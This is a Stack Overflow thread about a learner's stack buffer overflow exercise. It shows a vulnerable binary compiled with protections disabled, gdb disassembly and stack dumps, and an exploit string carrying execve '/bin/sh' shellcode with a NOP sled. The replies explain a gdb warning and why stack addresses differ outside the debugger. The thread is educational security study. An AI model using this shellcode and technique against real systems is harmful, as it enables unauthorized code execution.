5

I'm learning how to overflow the buffer. I have a hard time overwriting return address. This is vulnerable code I'm trying to exploit:

(gdb) disas main 
Dump of assembler code for function main:
0x0804845b <+0>:     push   ebp
0x0804845c <+1>:     mov    ebp,esp
0x0804845e <+3>:     sub    esp,0x100
0x08048464 <+9>:     mov    eax,DWORD PTR [ebp+0xc]
0x08048467 <+12>:    add    eax,0x4
0x0804846a <+15>:    mov    eax,DWORD PTR [eax]
0x0804846c <+17>:    push   eax
0x0804846d <+18>:    call   0x8048340 <strlen@plt>
0x08048472 <+23>:    add    esp,0x4
0x08048475 <+26>:    mov    edx,eax
0x08048477 <+28>:    mov    eax,DWORD PTR [ebp+0xc]
0x0804847a <+31>:    add    eax,0x4
0x0804847d <+34>:    mov    eax,DWORD PTR [eax]
0x0804847f <+36>:    push   edx
0x08048480 <+37>:    push   eax
0x08048481 <+38>:    lea    eax,[ebp-0x100]
0x08048487 <+44>:    push   eax
0x08048488 <+45>:    call   0x8048320 <memcpy@plt>
0x0804848d <+50>:    add    esp,0xc
0x08048490 <+53>:    lea    eax,[ebp-0x100]
0x08048496 <+59>:    push   eax
0x08048497 <+60>:    call   0x8048310 <printf@plt>
0x0804849c <+65>:    add    esp,0x4
0x0804849f <+68>:    leave  
0x080484a0 <+69>:    ret

I have disabled ASLR. I complied it with:

gcc -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector vuln.c -o vuln

I'm using -mpreferred-stack-boundary=2, because without it, disassembly looks very different from tutorials I follow. Buffer is 256 bytes long. So 264 bytes are enough to overwrite the saved EIP, which I do with:

r $(python -c 'print "\x90"*234+"\x31\xc9\xf7\xe1\xb0\x0b\xeb\x06\x5b\x51\x53\x5b\xcd\x80\xe8\xf5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"+"\x58\xd0\xff\xff"')

Shellcode takes 26 bytes. Stack is looking like so when EIP is at main+68:

(gdb) x/100x $esp
0xffffd058:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd068:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd078:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd088:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd098:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0a8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0b8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0c8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0d8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0e8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd0f8:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd108:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd118:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd128:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd138:     0x90909090      0x90909090      0xc9319090      0x0bb0e1f7
0xffffd148:     0x515b06eb      0x80cd5b53      0xfffff5e8      0x69622fff
0xffffd158:     0x68732f6e      0xffffd058      0x00000002      0xffffd1f4
0xffffd168:     0xffffd200      0xf7feac7a      0x00000002      0xffffd1f4
0xffffd178:     0xffffd194      0x08049730      0x0804821c      0xf7fb2000
0xffffd188:     0x00000000      0x00000000      0x00000000      0xcad6d58d
0xffffd198:     0xf1c0519d      0x00000000      0x00000000      0x00000000
0xffffd1a8:     0x00000002      0x08048360      0x00000000      0xf7ff04b0
0xffffd1b8:     0xf7e25979      0xf7ffd000      0x00000002      0x08048360
0xffffd1c8:     0x00000000      0x08048381      0x0804845b      0x00000002
0xffffd1d8:     0xffffd1f4      0x080484b0      0x08048520      0xf7feb130

Return address is located at 0xFFFFD15C. After leave stack looks like this:

(gdb) si
0x080484a0 in main ()
(gdb) x/16x $esp
0xffffd15c:     0xffffd058      0x00000002      0xffffd1f4      0xffffd200
0xffffd16c:     0xf7feac7a      0x00000002      0xffffd1f4      0xffffd194
0xffffd17c:     0x08049730      0x0804821c      0xf7fb2000      0x00000000
0xffffd18c:     0x00000000      0x00000000      0xcad6d58d      0xf1c0519d

The next instruction ret, should move address 0xFFFFD058 into EIP and execute nopslide with shellcode, but it isn't.

(gdb) si
Cannot access memory at address 0x68732f72
(gdb) x/16x $esp
0xffffd160:     0x00000002      0xffffd1f4      0xffffd200      0xf7feac7a
0xffffd170:     0x00000002      0xffffd1f4      0xffffd194      0x08049730
0xffffd180:     0x0804821c      0xf7fb2000      0x00000000      0x00000000
0xffffd190:     0x00000000      0xcad6d58d      0xf1c0519d      0x00000000
(gdb) i r
eax            0x109    265
ecx            0x0      0
edx            0xf7fb3878       -134530952
ebx            0xf7fb2000       -134537216
esp            0xffffd160       0xffffd160
ebp            0x68732f6e       0x68732f6e
esi            0x0      0
edi            0x0      0
eip            0xffffd058       0xffffd058
eflags         0x282    [ SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
Jester
  • 56,577
  • 4
  • 81
  • 125
piesku
  • 75
  • 1
  • 6

1 Answers1

5

That's a harmless warning from gdb, it's not a program error. The eip is correctly set to 0xffffd058. gdb is probably trying to access frame information, but since ebp is not valid, it fails. Doesn't affect the execution of your program, you can continue stepping as usual.

For program errors, you will clearly see a SIGSEGV error message.

Jester
  • 56,577
  • 4
  • 81
  • 125
  • That error was caused by python. I runned it without debugger and dumped a core. `Python Exception Cannot access memory at address 0x80cd0bb4`. Now it works, but I had to relocate shellcode on the beggining. I had `SIGSEGV` in the middle of the shellcode execution. Somehow stack got altered and instructions changed. – piesku Jul 09 '15 at 13:17
  • Shellcode is executed only within `GDB`. When I run it from command line, I keep getting `SIGSEGV` and instructions are altered. For example `xor %eax, %eax` is changed into `enter $0xe126,$0xf7` Why is this happening? – piesku Jul 09 '15 at 13:27
  • Different memory layout, you are probably overwriting your code, or jumping into middle of instructions. – Jester Jul 09 '15 at 15:51
  • Ok solved, when program starts system puts environment variables onto stack. `GDB`adds his own environment variables + shell variables. So the shellcode is moved in stack. To get absolute stack addresses, You need to unset variables from `GDB` and invoke program identically, because `argv[0]` matters too. http://stackoverflow.com/questions/17775186/buffer-overflow-works-in-gdb-but-not-without-it – piesku Jul 09 '15 at 16:51